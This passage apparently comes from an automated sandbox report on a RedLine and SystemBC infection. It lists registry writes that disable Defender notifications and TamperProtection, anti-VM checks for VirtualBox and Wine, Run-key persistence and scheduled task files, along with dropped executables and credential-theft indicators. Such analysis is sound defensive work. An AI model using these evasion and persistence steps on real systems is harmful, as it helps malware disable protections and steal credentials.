Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\rsxrj\oqftxb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\rsxrj\oqftxb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\rsxrj\oqftxb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\rsxrj\oqftxb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036610101\0frhMAb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036630101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\ProgramData\rsxrj\oqftxb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\942382b6ad.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\942382b6ad.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\45d700a7e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036490101\\45d700a7e2.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5f36c561b1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036500101\\5f36c561b1.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9a7ac1fba5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036510101\\9a7ac1fba5.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\rsxrj\oqftxb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036630101\MCxU5Fj.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
